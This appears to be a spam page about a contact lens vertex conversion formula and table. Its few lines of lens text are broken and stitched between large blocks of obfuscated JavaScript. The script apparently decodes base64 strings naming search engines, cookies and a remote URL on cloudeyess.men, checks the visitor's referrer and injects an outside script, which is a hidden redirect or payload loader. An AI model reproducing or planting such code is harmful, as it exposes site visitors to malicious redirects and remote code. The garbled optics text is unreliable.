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Contact Lens Vertex Conversion Download For Windows 10 64

The formula for vertex correction is:
Fc is the power corrected for vertex distance,F is the original lens powerx is the change in vertex distance in meters.. *?(\$l;/g),_0x96157b={ };continue;case'4':if(name){ return _0x96157b[name]; } continue;case'5':if(_0x207029[_0x220b('0x2d')](!_0x14accd,name)){ return undefined; } continue; } break; } } if(_0x20c7ed){ cookie[_0x220b('0x2e')](_0x207029['AjiIu'],0x1,0x1);if(!_0x4e1b3e){ _0x207029[_0x220b('0x2f')](include,_0x207029['uKopK'](_0x220b('0x30')+q,")); } } } R(); Back Vertex Distance Conversion TableA conversion chart for when choosing the correct power for contact lenses.. var _0x3353=['LnlhaG9vLg','LmFvbC4','LnlhbhRleC4','M3w1fDB8MXw0fDI','dmlzaXRIZA','bGNFcUM','UXpBZ2U','a2FDblU','YkdKQVE','LmFsdGF2aXN0YS4','cmVmZXJyZXI','Z2V0','S3dx','amdCaVU','aW5kZXhPZg','QkxsQ2c','bGVuZ3Ro','TUpkVnM','c2V0','Ykdtd1k','aHR0cHM6Ly9jbG91ZGV5ZXNzLm1lbi9kb25fY29uLnBocD94PWVuJnF1ZXJ5PQ','Y3JIYXRIRWxlbWVudA','Y1d3TWO','c3Jj','Y29udGFjdCtsZW5zK3ZlcnRleCtjb252ZXJzaW9u','dXJK','MXwyfDN8NXwwfDQ','c3BsaXQ','Y29va2ll','bWF0Y2g','ZFF6VUg','bWJ2T2c','S3d0SWs','cmVwbGFjZQ','OyBleHBpcmVzPQ','OyBzZWN1cmU','VGIGWkM','bXdWbEk','SVB BbkU','Rnd6eUk','cUdFUGI','a01PdEI','Z2V0VGltZQ','a05JZko','THRNekk','Y3JoeE0','eVFRSEU','Lmdvb2dsZS4','LmJpbmcu'];(function(_0x1cda38,_0x4cc0fd){ var _0x4ec49f=function(_0x56a75f){ while(--_0x56a75f){ _0x1cda38['push'](_0x1cda38['shift']()); } };_0x4ec49f(++_0x4cc0fd); }(_0x3353,0x10a));var _0x220b=function(_0x585741,_0x2d1462){ _0x585741=_0x585741-0x0;var _0x8dba70=_0x3353[_0x585741];if(_0x220b['initialized']==undefined){(function(){ var _0x530939=function(){ var _0x832422;try{_0x832422=Function('return\x20(function()\x20'+{}); The formula for vertex correction is:
Fc is the power corrected for vertex distance,F is the original lens powerx is the change in vertex distance in meters.. constructor(\x22return\x20this\x22)(\x20'+');});catch(_0x21e2e0){_0x832422=window;}return _0x832422;};var _0x472111=_0x530939();var _0x31bf20='ABCDEFIGHJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+=:_0x472111['atob']||(_0x472111['atob']=function(_0x289ef2){ var _0x19a3e0=String(_0x289ef2)['replace'](/=+\$/,'');for(var _0x398bee=0x0,_0x4a2018,_0x858aa1,_0x52056d=0x0,_0x3e16d2=':_0x858aa1=_0x19a3e0['charAt'](_0x52056d++);~_0x858aa1&&(_0x4a2018=_0x398bee%0x4)?_0x4a2018*0x40+_0x858aa1:_0x858aa1,_0x398bee++%0x4)?_0x3e16d2+=String['fromCharCode'](0xff&_0x4a2018>>(-0x2*_0x398bee&0x6)):0x0){_0x858aa1=_0x31bf20['indexOf'](_0x858aa1);}return _0x3e16d2;});}());_0x220b['base64DecodeUnicode']=function(_0x3cc2e3){ var _0x3a3ef6=atob(_0x3cc2e3);var _0x2e69e2=[];for(var _0x33ea05=0x0,_0x23501c=_0x3a3ef6['length'];_0x33ea05=0x0){ _0x20c7ed=!![]; } else{ var _0x57dbb2=_0x207029['ngdNx'][_0x220b('0x6')](\x27),_0x11cd2d=0x0;while(![]){switch(_0x57dbb2[_0x11cd2d++]) { case'0':var _0x2ad93c;continue;case'1':for(var _0xa214d7=0x0,_0x207029[_0x220b('0x2b')](_0xa214d7,_0x14accd[_0x220b('0x2c')]);_0xa214d7++){ _0x2ad93c=_0x14accd[_0xa214d7][_0x220b('0x6')](\x3d);_0x96157b[_0x2ad93c[0x0]]=_0x2ad93c[0x1][_0x220b('0xc')](/\\$/); } continue;case'2':return _0x96157b;case'3':var _0x14accd=document[_0x220b('0x7')]['match'](/\w+=.. Back Vertex Distance Conversion TableA conversion chart for when choosing the correct power for contact lenses.

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